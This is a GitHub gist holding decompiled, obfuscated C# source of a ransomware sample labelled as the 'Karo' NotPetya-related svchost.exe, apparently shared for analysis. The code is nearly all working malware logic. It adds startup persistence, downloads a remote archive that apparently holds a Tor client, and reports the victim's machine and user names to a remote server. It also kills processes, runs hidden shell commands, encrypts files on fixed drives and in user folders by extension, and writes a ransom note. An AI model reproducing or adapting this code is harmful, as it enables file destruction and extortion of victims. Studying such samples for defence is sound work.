Skip to content

Instantly share code, notes, and snippets.

@aserper

aserper/gist:d0f1f2eb66b582ca04f195707a8d0126

Created July 2, 2017 11:54
Show Gist options
  • Star 0 You must be signed in to star a gist
  • Fork 0 You must be signed in to fork a gist
  • Save aserper/d0f1f2eb66b582ca04f195707a8d0126 to your computer and use it in GitHub Desktop.
Save aserper/d0f1f2eb66b582ca04f195707a8d0126 to your computer and use it in GitHub Desktop.
Download ZIP
Form1 from Karo. NotPetya svchost.exe
Raw
gistfile1.txt
using ;
using ;
using ;
using ;
using ;
using IWshRuntimeLibrary;
using SmartAssembly.Delegates;
using SmartAssembly.HouseOfCards;
using System;
using System.Collections.Generic;
using System.ComponentModel;
using System.Diagnostics;
using System.IO;
using System.Linq;
using System.Management;
using System.Net;
using System.Net.Sockets;
using System.Runtime.CompilerServices;
using System.Threading;
using System.Windows.Forms;
namespace karo
{
public sealed class Form1 : Form
{
[CompilerGenerated]
[Serializable]
internal sealed class <>c
{
public static readonly Form1.<>c <>9;
public static Func<ManagementObject, object> <>9__19_0;
public static Func<DriveInfo, bool> <>9__24_0;
public static Func<Process, bool> <>9__24_1;
[NonSerialized]
internal static GetString ;
static <>c()
{
// Note: this type is marked as 'beforefieldinit'.
Strings.CreateGetStringDelegate(typeof(Form1.<>c));
Form1.<>c.<>9 = new Form1.<>c();
}
internal object (ManagementObject managementObject)
{
return global::.~(managementObject, Form1.<>c.(5618));
}
internal bool (DriveInfo driveInfo)
{
bool arg_26_0;
while (true)
{
if (false)
{
goto IL_0E;
}
int arg_0C_0 = global::.~˜(driveInfo) ? 1 : 0;
IL_0C:
if (arg_0C_0 != 0 || 3 == 0)
{
goto IL_0E;
}
if (false)
{
continue;
}
arg_26_0 = ((arg_0C_0 = 0) != 0);
IL_23:
if (!false)
{
break;
}
goto IL_0C;
IL_0E:
arg_26_0 = ((arg_0C_0 = ((.~–(driveInfo) == DriveType.Fixed) ? 1 : 0)) != 0);
goto IL_23;
}
return arg_26_0;
}
internal bool (Process process)
{
return global::.(global::.~†(process), Form1.<>c.(20042));
}
}
private readonly string  = Environment.MachineName;
private readonly string  = Environment.UserName;
private string ;
private string  = string.Empty;
private string ;
private int ;
private readonly HashSet<string>  = new HashSet<string>();
private Queue<string>  = new Queue<string>();
private byte[] ;
private readonly string  = Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData);
private bool ;
private string ;
private readonly string  = Path.GetTempPath();
private readonly HashSet<string>  = new HashSet<string>(global::..());
private static Socket ;
private static Process ;
internal readonly byte[]  = new byte[]
{
1,
2,
3,
4,
5,
6,
7,
8
};
private IContainer  = null;
[NonSerialized]
internal static GetString ;
public Form1()
{
global::..(this);
}
internal void (object obj, EventArgs eventArgs)
{
if (!false)
{
}
if (3 == 0)
{
goto IL_29;
}
global:: expr_07 = global::.;
double expr_0E = 100.0;
if (!false)
{
expr_07(this, expr_0E);
}
IL_1D:
global::.(this, false);
IL_28:
IL_29:
global:: expr_29 = global::.;
bool expr_30 = false;
if (true)
{
expr_29(this, expr_30);
}
if (false)
{
goto IL_1D;
}
this.();
if (!false)
{
return;
}
goto IL_28;
}
public void ()
{
while (true)
{
bool flag = false;
try
{
try
{
ManagementObjectSearcher managementObjectSearcher = new ManagementObjectSearcher(Form1.(22));
try
{
ManagementObjectCollection managementObjectCollection = global::.~(managementObjectSearcher);
try
{
ManagementObjectCollection.ManagementObjectEnumerator managementObjectEnumerator = global::.~(managementObjectCollection);
try
{
while (global::.~•(managementObjectEnumerator))
{
ManagementBaseObject managementBaseObject = global::.~(managementObjectEnumerator);
string text = global::.~(global::.~(global::.~(managementBaseObject, Form1.(71))));
bool flag2 = (global::.(text, Form1.(88)) && global::.~(global::.~(global::.~(global::.~(managementBaseObject, Form1.(117)))), Form1.(126))) || global::.~(text, Form1.(139)) || global::.(global::.~(global::.~(managementBaseObject, Form1.(117))), Form1.(148));
if (flag2)
{
flag = true;
}
}
}
finally
{
if (managementObjectEnumerator != null)
{
global::.~(managementObjectEnumerator);
}
}
}
finally
{
if (managementObjectCollection != null)
{
global::.~(managementObjectCollection);
}
}
}
finally
{
if (managementObjectSearcher != null)
{
global::.~(managementObjectSearcher);
}
}
}
catch
{
}
bool flag3 = flag;
if (flag3)
{
try
{
ProcessStartInfo processStartInfo = new ProcessStartInfo
{
FileName = global::..(Form1.(165)),
Arguments = global::..(Form1.(222)),
UseShellExecute = false,
CreateNoWindow = true
};
global::.‚(processStartInfo);
global::.ƒ();
.‡(0);
}
catch
{
}
}
global::..();
WshShell wshShell = new WshShellClass();
string pathLink = .‹(.Š(Environment.SpecialFolder.Startup), Form1.(311));
IWshShortcut wshShortcut = (IWshShortcut)wshShell.CreateShortcut(pathLink);
wshShortcut.TargetPath = .‹(.Š(Environment.SpecialFolder.ApplicationData), Form1.(328));
wshShortcut.Save();
int num = 1;
try
{
string text2 = .(Form1.(345));
bool flag4 = text2 != null;
if (flag4)
{
try
{
num = global::.–(text2);
}
catch
{
}
}
}
catch
{
}
string text3 = .Ž(.Š(Environment.SpecialFolder.System));
IEnumerable<DriveInfo> arg_369_0 = .˜();
Func<DriveInfo, bool> arg_369_1;
if ((arg_369_1 = Form1.<>c.<>9__24_0) == null)
{
arg_369_1 = (Form1.<>c.<>9__24_0 = new Func<DriveInfo, bool>(Form1.<>c.<>9.));
}
IEnumerable<DriveInfo> enumerable = arg_369_0.Where(arg_369_1);
bool flag5 = .™(.‹(this., Form1.(374)));
if (flag5)
{
this. = .~(.œ(), .Ÿ(.‹(this., Form1.(374))));
this. = .~(.œ(), this.);
this. = .~(.(), this.);
}
else
{
this. = global::..(32);
this. = .~(.œ(), this.);
this. = .~(.(), this.);
try
{
€.(.‹(this., Form1.(374)), .~(.œ(), this.));
.(.‹(this., Form1.(374)), FileAttributes.Hidden);
}
catch
{
}
}
bool flag6 = .™(.‹(this., Form1.(328)));
if (flag6)
{
try
{
‚.(.‹(this., Form1.(328)));
„.(ƒ.(), .‹(this., Form1.(328)));
}
catch
{
}
}
bool flag7 = !.™(.‹(this., Form1.(328)));
if (flag7)
{
try
{
„.(ƒ.(), .‹(this., Form1.(328)));
}
catch
{
}
}
string text4 = global::..(5);
.  = new .();
bool flag8 = !.š(this.);
if (flag8)
{
†.(this.);
}
bool flag9 = .š(.‹(this., Form1.(383))) && ‡.(.‹(this., Form1.(383))).Length == 11;
if (flag9)
{
try
{
IEnumerable<Process> arg_6C9_0 = ˆ.();
Func<Process, bool> arg_6C9_1;
if ((arg_6C9_1 = Form1.<>c.<>9__24_1) == null)
{
arg_6C9_1 = (Form1.<>c.<>9__24_1 = new Func<Process, bool>(Form1.<>c.<>9.));
}
IEnumerator<Process> enumerator = arg_6C9_0.Where(arg_6C9_1).GetEnumerator();
try
{
while (global::.~–(enumerator))
{
Process current = enumerator.Current;
if (current != null)
{
global::.(current);
}
}
}
finally
{
if (enumerator != null)
{
global::.~(enumerator);
}
}
}
catch
{
}
}
else
{
while (true)
{
try
{
WebClient webClient = new WebClient
{
Proxy = null
};
‹.~(webClient, new Uri(global::..(Form1.(392))), Š.(this., text4, Form1.(513)));
}
catch
{
continue;
}
break;
}
bool flag10 = !.™(Š.(this., text4, Form1.(513)));
if (false)
{
goto IL_1114;
}
if (flag10)
{
continue;
}
FileInfo fileInfo = new FileInfo(Š.(this., text4, Form1.(513)));
int num2 = (int)(Œ.~(fileInfo) / 1024L);
bool flag11 = num2 < 4000;
if (flag11)
{
continue;
}
global::.  = global::..(Š.(this., text4, Form1.(513)));
try
{
IEnumerator<global::.> enumerator2 = .();
try
{
while (global::.~–(enumerator2))
{
global::. current2 = enumerator2.Current;
global::..(.., current2, .‹(this., text4));
}
}
finally
{
if (enumerator2 != null)
{
global::.~(enumerator2);
}
}
}
finally
{
if ( != null)
{
global::.~();
}
}
bool flag12 = !.š(.‹(this., text4));
if (flag12)
{
continue;
}
‚.(Š.(this., text4, Form1.(513)));
„.(Š.(this., text4, Form1.(522)), .‹(global::..(Form1.(539)), ƒ.()));
„.(Š.(this., text4, Form1.(522)), .‹(global::..(Form1.(572)), ƒ.()));
„.(Š.(this., text4, Form1.(522)), .‹(global::..(Form1.(605)), ƒ.()));
„.(Š.(this., text4, Form1.(522)), .‹(global::..(Form1.(718)), ƒ.()));
„.(Š.(this., text4, Form1.(522)), .‹(global::..(Form1.(751)), ƒ.()));
„.(Š.(this., text4, Form1.(522)), .‹(global::..(Form1.(796)), ƒ.()));
„.(Š.(this., text4, Form1.(845)), .‹(this., Form1.(845)));
„.(.‹(this., Form1.(854)), .‹(this., Form1.(871)));
‚.(.‹(this., Form1.(854)));
.‚(.‹(this., text4), true);
try
{
ProcessStartInfo processStartInfo2 = new ProcessStartInfo
{
FileName = global::..(Form1.(165)),
Arguments = Š.(Form1.(908), this., Form1.(925)),
UseShellExecute = false,
CreateNoWindow = true
};
global::.‚(processStartInfo2);
}
catch
{
}
}
global::. ;
while (true)
{
Form1. = new Process
{
StartInfo = new ProcessStartInfo
{
FileName = .‹(this., global::..(Form1.(962))),
Arguments = global::..(Form1.(1011)),
UseShellExecute = false,
RedirectStandardOutput = true,
CreateNoWindow = true,
WorkingDirectory = .‹(this., global::..(Form1.(1036)))
}
};
global::.~—(Form1.);
IPEndPoint iPEndPoint = new IPEndPoint(.„(global::..(Form1.(1049))), 9056);
.ˆ(10000);
while (true)
{
try
{
Form1. = new Socket(AddressFamily.InterNetwork, SocketType.Stream, ProtocolType.Tcp);
.~†(Form1., iPEndPoint);
‘.~ˆ(Form1., .~(.(), .‹(global::..(Form1.(1066)), ƒ.())));
}
catch
{
continue;
}
break;
}
 = new global::.(IPAddress.Loopback, 8181, IPAddress.Loopback, 9055, global::...);
this. = global::..(, ’.‰(new string[]
{
Form1.(1095),
.,
Form1.(1160),
this.,
Form1.(1173),
global::..(this),
Form1.(1182),
this.
}));
bool flag13 = global::.~(this., Form1.(1195));
if (flag13)
{
break;
}
bool flag14 = global::.~(this., Form1.(1204));
if (flag14)
{
try
{
global::.~(Form1.);
“.~Š(Form1., SocketShutdown.Both);
global::.~(Form1.);
continue;
}
catch
{
continue;
}
goto IL_EE3;
}
goto IL_EE3;
}
goto IL_16AC;
IL_EE3:
this. = this.;
string text5 = this.;
string text6 = this.;
this. = global::..(2048, text6, text5);
bool flag15;
do
{
this. = global::..(, ”.‹(Form1.(1213), ., Form1.(1282), this.));
flag15 = !global::.~(this., Form1.(1291));
}
while (flag15);
try
{
ProcessStartInfo processStartInfo3 = new ProcessStartInfo
{
FileName = global::..(Form1.(165)),
Arguments = global::..(Form1.(1304)),
UseShellExecute = false,
CreateNoWindow = true
};
global::.‚(processStartInfo3);
}
catch
{
}
try
{
ProcessStartInfo processStartInfo4;
if (!false)
{
processStartInfo4 = new ProcessStartInfo
{
FileName = global::..(Form1.(165)),
Arguments = global::..(Form1.(1385)),
UseShellExecute = false,
CreateNoWindow = true
};
}
global::.‚(processStartInfo4);
}
catch
{
}
try
{
ProcessStartInfo processStartInfo5 = new ProcessStartInfo
{
FileName = global::..(Form1.(165)),
Arguments = global::..(Form1.(1450)),
UseShellExecute = false,
CreateNoWindow = true
};
global::.‚(processStartInfo5);
}
catch
{
}
try
{
ProcessStartInfo processStartInfo6 = new ProcessStartInfo
{
FileName = global::..(Form1.(165)),
Arguments = global::..(Form1.(1515)),
UseShellExecute = false,
CreateNoWindow = true
};
global::.‚(processStartInfo6);
}
catch
{
}
IL_1114:
try
{
ProcessStartInfo processStartInfo7 = new ProcessStartInfo
{
FileName = global::..(Form1.(165)),
Arguments = global::..(Form1.(1580)),
UseShellExecute = false,
CreateNoWindow = true
};
global::.‚(processStartInfo7);
}
catch
{
}
IEnumerator<DriveInfo> enumerator3 = enumerable.GetEnumerator();
try
{
while (global::.~–(enumerator3))
{
DriveInfo current3 = enumerator3.Current;
bool flag16 = global::.~˜(current3) && global::.Ž(global::.~(current3), text3);
if (flag16)
{
IEnumerable<string> enumerable2 = global::..(global::.~(current3));
IEnumerator<string> enumerator4 = enumerable2.GetEnumerator();
try
{
while (global::.~–(enumerator4))
{
string current4 = enumerator4.Current;
bool flag17 = !.š(current4);
if (flag17)
{
string text7 = .(current4);
bool flag18 = global::.Ž(text7, Form1.(1641));
if (flag18)
{
bool flag19 = this..Contains(text7);
if (flag19)
{
this..Add(current4);
}
}
}
}
}
finally
{
if (enumerator4 != null)
{
global::.~(enumerator4);
}
}
}
}
}
finally
{
if (enumerator3 != null)
{
global::.~(enumerator3);
}
}
List<string> list = new List<string>
{
.Š(Environment.SpecialFolder.Desktop),
.Š(Environment.SpecialFolder.Personal),
.Š(Environment.SpecialFolder.DesktopDirectory),
.Š(Environment.SpecialFolder.MyMusic),
.Š(Environment.SpecialFolder.MyPictures)
};
foreach (string current5 in list)
{
IEnumerable<string> enumerable3 = global::..(current5);
IEnumerator<string> enumerator6 = enumerable3.GetEnumerator();
try
{
while (global::.~–(enumerator6))
{
string current6 = enumerator6.Current;
bool flag20 = !.š(current6);
if (flag20)
{
string text8 = .(current6);
bool flag21 = global::.Ž(text8, Form1.(1641));
if (flag21)
{
bool flag22 = this..Contains(text8);
if (flag22)
{
this..Add(current6);
}
}
}
}
}
finally
{
if (enumerator6 != null)
{
global::.~(enumerator6);
}
}
}
this. = new Queue<string>(this.);
bool flag23 = this..Count == 0;
if (!flag23)
{
this..Clear();
this. = true;
for (int i = 0; i < num; i++)
{
Thread thread = new Thread(new ThreadStart(this.))
{
IsBackground = false,
Priority = ThreadPriority.Highest
};
global::.~(thread);
}
while (this..Count != 0)
{
.ˆ(500);
}
bool flag24;
do
{
this. = global::..(, –.(new object[]
{
Form1.(1650),
.,
Form1.(1711),
this.
}));
flag24 = !global::.~(this., Form1.(1724));
}
while (flag24);
StreamReader streamReader = new StreamReader(˜.~(—.Ž(), Form1.(1733)));
try
{
string text9 = global::.~(streamReader);
„.(.‹(.Š(Environment.SpecialFolder.DesktopDirectory), Form1.(1758)), ™.~(text9, Form1.(1775), ’.‰(new string[]
{
Form1.(1788),
this.,
Form1.(1801),
.,
Form1.(1810),
this.,
Form1.(1801),
.,
Form1.(1815)
})));
}
finally
{
if (streamReader != null)
{
global::.~(streamReader);
}
}
string text10 = ”.‹(this., Form1.(1824), text4, Form1.(1829));
bool flag25 = global::..(text10, Form1.(1838), );
if (flag25)
{
global::..(this, text10);
}
}
IL_16AC:
try
{
global::.~(Form1.);
bool flag26 = !global::.~™(Form1.);
if (flag26)
{
global::.~(›.(š.~’(Form1.)));
}
“.~Š(Form1., SocketShutdown.Both);
global::.~(Form1.);
}
catch
{
}
try
{
bool flag27 = .™(.‹(this., Form1.(374)));
if (flag27)
{
‚.(.‹(this., Form1.(374)));
}
}
catch
{
}
}
catch (Exception var_78_178D)
{
}
finally
{
try
{
œ.(.‹(.Š(Environment.SpecialFolder.DesktopDirectory), Form1.(1758)));
}
catch
{
}
try
{
ProcessStartInfo processStartInfo8 = new ProcessStartInfo
{
FileName = global::..(Form1.(165)),
Arguments = global::..(Form1.(222)),
UseShellExecute = false,
CreateNoWindow = true
};
global::.‚(processStartInfo8);
ProcessStartInfo processStartInfo9 = new ProcessStartInfo
{
FileName = global::..(Form1.(165)),
Arguments = global::..(Form1.(1891)),
UseShellExecute = false,
CreateNoWindow = true
};
global::.‚(processStartInfo9);
}
catch
{
}
global::.ƒ();
}
break;
}
}
public void ()
{
bool flag = this..Count == 0;
if (flag)
{
this. = false;
}
else
{
try
{
string text = this..Dequeue();
bool flag2 = text != null;
if (flag2)
{
FileInfo fileInfo = new FileInfo(text);
bool flag3 = global::.(global::.~(fileInfo), Form1.(1980)) || global::.(global::.~(fileInfo), Form1.(1989)) || global::.(global::.~(fileInfo), Form1.(1998)) || global::.(global::.~(fileInfo), Form1.(2003)) || global::.(global::.~(fileInfo), Form1.(2012)) || global::.(global::.~(fileInfo), Form1.(2021)) || global::.(global::.~(fileInfo), Form1.(2026)) || global::.(global::.~(fileInfo), Form1.(2035)) || global::.(global::.~(fileInfo), Form1.(2044)) || global::.(global::.~(fileInfo), Form1.(2049)) || global::.(global::.~(fileInfo), Form1.(2054)) || global::.(global::.~(fileInfo), Form1.(2063)) || global::.(global::.~(fileInfo), Form1.(1829)) || global::.(global::.~(fileInfo), Form1.(2072)) || global::.(global::.~(fileInfo), Form1.(2081)) || global::.(global::.~(fileInfo), Form1.(2090)) || global::.(global::.~(fileInfo), Form1.(2099)) || global::.(global::.~(fileInfo), Form1.(2108)) || global::.(global::.~(fileInfo), Form1.(2117)) || global::.(global::.~(fileInfo), Form1.(2126)) || global::.(global::.~(fileInfo), Form1.(2135)) || global::.(global::.~(fileInfo), Form1.(2026));
if (flag3)
{
byte[] array = .Ÿ(text);
bool flag4 = this. != null;
if (flag4)
{
byte[] array2 = global::..(this., array, this);
bool flag5 = array2 != null;
if (flag5)
{
€.(text, array2);
}
}
„.(text, .‹(text, Form1.(1641)));
.(ref this.);
}
else
{
bool flag6 = Œ.~(fileInfo) < 5000L;
if (flag6)
{
byte[] array3 = .Ÿ(text);
bool flag7 = this. != null;
if (flag7)
{
byte[] array4 = global::..(this., array3, this);
bool flag8 = array4 != null;
if (flag8)
{
€.(text, array4);
}
}
„.(text, .‹(text, Form1.(1641)));
.(ref this.);
}
else
{
byte[] array5 = new byte[4096];
BinaryReader binaryReader = new BinaryReader(ž.(text, FileMode.Open));
try
{
bool flag9 = this. != null;
if (flag9)
{
byte[] array6 = Ÿ.~(binaryReader, 4096);
byte[] array7 = this.;
byte[] array8 = global::..(array7, array6, this);
.(array8, array5, array8.Length);
}
}
finally
{
if (binaryReader != null)
{
global::.~(binaryReader);
}
}
BinaryWriter binaryWriter = new BinaryWriter(ž.(text, FileMode.Open));
try
{
.~(binaryWriter, array5);
}
finally
{
if (binaryWriter != null)
{
global::.~(binaryWriter);
}
}
„.(text, .‹(text, Form1.(1641)));
.(ref this.);
}
}
}
}
catch (Exception var_19_61A)
{
}
}
bool flag10 = this.;
if (flag10)
{
global::..(this);
}
}
protected override void (bool flag)
{
while (true)
{
if (8 != 0)
{
if (!flag)
{
goto IL_14;
}
int arg_4B_0 = (this. != null) ? 1 : 0;
IL_15:
bool flag2 = arg_4B_0 != 0;
do
{
bool expr_4E = (arg_4B_0 = (flag2 ? 1 : 0)) != 0;
if (3 == 0)
{
goto IL_12;
}
if (!expr_4E)
{
goto IL_35;
}
}
while (false);
if (true)
{
goto IL_25;
}
goto IL_14;
IL_12:
goto IL_15;
IL_14:
arg_4B_0 = 0;
goto IL_15;
}
goto IL_25;
IL_35:
if (!false)
{
break;
}
continue;
IL_25:
global::.~(this.);
goto IL_35;
}
global::.(this, flag);
}
static Form1()
{
// Note: this type is marked as 'beforefieldinit'.
Strings.CreateGetStringDelegate(typeof(Form1));
}
}
}
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment